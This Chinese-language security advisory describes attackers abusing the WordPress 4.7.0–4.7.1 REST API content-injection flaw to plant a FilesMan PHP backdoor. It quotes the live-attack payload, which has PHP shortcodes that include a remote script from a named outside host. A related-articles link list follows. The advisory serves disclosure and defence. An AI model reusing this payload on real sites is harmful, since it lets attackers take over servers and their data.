高危漏洞预警:WordPress REST API 被利用安装后门

简介:

近期攻击者发现了一种利用WordPress REST API漏洞的方法,并通过安装隐藏的后门来获得对受害者服务器的完全访问。

1月26日,WordPress团队发布了WordPress 4.7.2,其中包含一个解决WordPress REST API中的漏洞的秘密修复,影响到REST API——来自Sucuri的安全研究人员最先发现该漏洞。未经授权的攻击者利用该漏洞可注入恶意内容,以及进行提权,对文章、页面等内容进行修改。REST API是最近添加到WordPress 4.7.0并默认启用的。

漏洞发现者Sucuri介绍,这个缺陷影响WordPress 4.7.0和4.7.1,并允许攻击者制作恶意HTTP请求,当发送到一个WordPress网站将允许黑客绕过身份验证方法,并更改博客帖子的标题和内容和静态 页面。

简单来说,攻击者发现了通过REST API缺陷将自己的PHP代码发送到WordPress站点的方法,直到那时它才被用于改变原有的文本。

content:"[insert_php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/insert_php]
[php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/php]",
"id":"61a"}

在实时攻击中看到的上述源代码片段将告诉WordPress引擎在每次用户访问该特定页面时执行以下PHP命令,如果黑客插入木马或其他恶意脚本,影响将会扩大。

include('http[:]//acommeamour.fr/tmp/xx.php');

这行PHP代码将在受害者的站点上包含一个远程PHP文件,它将在WordPress / wp-content / uploads /文件夹中下载并安装FilesMan PHP后门。

在将其HTTP请求发送到站点的WordPress REST API后,攻击者只需访问一次损坏的页面,然后访问后门并接管受害者的底层服务器。

鉴于WordPress使用的广泛性,该漏洞的影响还是比较大的。使用 WordPress REST API 是简便高效的通过 JSON 格式传输数据访问或控制 WordPress 站点内容的方法。API 提供了对用户、文章、分类等不同功能的控制,也可以通过 API 检索或修改文章。Wordpress REST API 插件在 4.70 集成到 WordPress 中,由于权限控制失效导致内容注入或修改。WordPress开发团队已经与Sucuri配合在最新的4.7.2版本中修复了该漏洞。

本文来自开源中国社区 [http://www.oschina.net]

目录
相关文章
|
2月前
|
数据库 数据安全/隐私保护 SEO
如何像我这样创建一个酷炫且能赚钱的网站(使用宝塔安装WordPress搭建子比主题)
如何像我这样创建一个酷炫且能赚钱的网站(使用宝塔安装WordPress搭建子比主题)
26 0
如何像我这样创建一个酷炫且能赚钱的网站(使用宝塔安装WordPress搭建子比主题)
|
2月前
|
JSON 缓存 API
title: 深入理解REST API设计的最佳实践
title: 深入理解REST API设计的最佳实践
31 0
|
2月前
|
Ubuntu 关系型数据库 MySQL
百度搜索:蓝易云【ubuntu系统服务器安装WordPress教程】
现在,你已经成功在Ubuntu系统服务器上安装了WordPress。可以使用你的域名或服务器IP地址访问WordPress网站,进行网站配置和内容发布。
82 0
|
3月前
|
分布式计算 Hadoop Java
[hadoop3.x系列]HDFS REST HTTP API的使用(二)HttpFS
[hadoop3.x系列]HDFS REST HTTP API的使用(二)HttpFS
47 1
|
3月前
|
分布式计算 Hadoop API
✨[hadoop3.x系列]HDFS REST HTTP API的使用(一)WebHDFS
✨[hadoop3.x系列]HDFS REST HTTP API的使用(一)WebHDFS
48 1
|
3月前
|
JSON 前端开发 生物认证
REST API 的指纹验证机制
REST API 的指纹验证机制
26 0
|
3月前
|
存储 关系型数据库 MySQL
如何在网站上安装 WordPress?
如何在网站上安装 WordPress?
85 0
|
4月前
|
JSON Kubernetes API
kubernetes REST Api详解(导入Swagger至Postman)
kubernetes REST Api详解(导入Swagger至Postman)
62 1
|
4月前
|
XML 资源调度 API
YARN REST API 总结
YARN REST API 总结
64 1
|
5月前
|
XML 安全 API
Rest API 开发分享
Rest API 开发分享

相关产品

  • 云迁移中心